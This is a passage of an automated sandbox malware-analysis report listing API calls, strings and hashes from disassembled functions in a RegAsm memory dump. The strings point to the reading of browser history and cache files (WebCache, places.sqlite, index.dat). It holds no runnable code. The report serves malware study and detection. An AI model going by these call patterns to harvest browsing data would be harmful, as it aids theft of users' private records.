                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                          • API String ID: 2887208581-2114579845
                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                          APIs
                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                          • LockResource.KERNEL32(00000000), ref: 004148EF
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                          APIs
                          Strings
                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: only a single result allowed for a SELECT that is part of an expression
                          • API String ID: 2221118986-1725073988
                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: $$8
                          • API String ID: 1475443563-435121686
                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                          APIs
                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                            • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                          • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                          • String ID:
                          • API String ID: 1979745280-0
                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                          APIs
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                          • memset.MSVCRT ref: 00403A55
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                          • String ID: history.dat$places.sqlite
                          • API String ID: 2641622041-467022611
                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                          APIs
                            • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                          • GetLastError.KERNEL32 ref: 00417627
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$File$PointerRead
                          • String ID:
                          • API String ID: 839530781-0
                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID: *.*$index.dat
                          • API String ID: 1974802433-2863569691
                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                          APIs
                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                          • GetLastError.KERNEL32 ref: 004175A2
                          • GetLastError.KERNEL32 ref: 004175A8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                          • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Temp$DirectoryFileNamePathWindows
                          • String ID:
                          • API String ID: 1125800050-0
                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseHandleSleep
                          • String ID: }A
                          • API String ID: 252777609-2138825249
                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                          APIs
                          • malloc.MSVCRT ref: 00409A10
                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                          • free.MSVCRT ref: 00409A31
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: freemallocmemcpy
                          • String ID:
                          • API String ID: 3056473165-0
                          • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                          • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: BINARY
                          • API String ID: 2221118986-907554435
                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                          • _mbscat.MSVCRT ref: 0040525B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 568699880-0
                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /stext
                          • API String ID: 2081463915-3817206916
                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                          • CloseHandle.KERNEL32(00000000), ref: 0040957A
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$??2@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 1023896661-0
                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                          • CloseHandle.KERNEL32(?), ref: 0040CC98
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 2445788494-0
                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcmpmemset
                          • String ID:
                          • API String ID: 1065087418-0
                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                          • CloseHandle.KERNEL32(?), ref: 00410654
                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                          • String ID:
                          • API String ID: 1381354015-0
                          • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                          • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                          APIs
                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                            • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$Time$CloseCompareCreateHandlememset
                          • String ID:
                          • API String ID: 2154303073-0
                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                          APIs
                          • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$PointerRead
                          • String ID:
                          • API String ID: 3154509469-0
                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                          APIs
                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
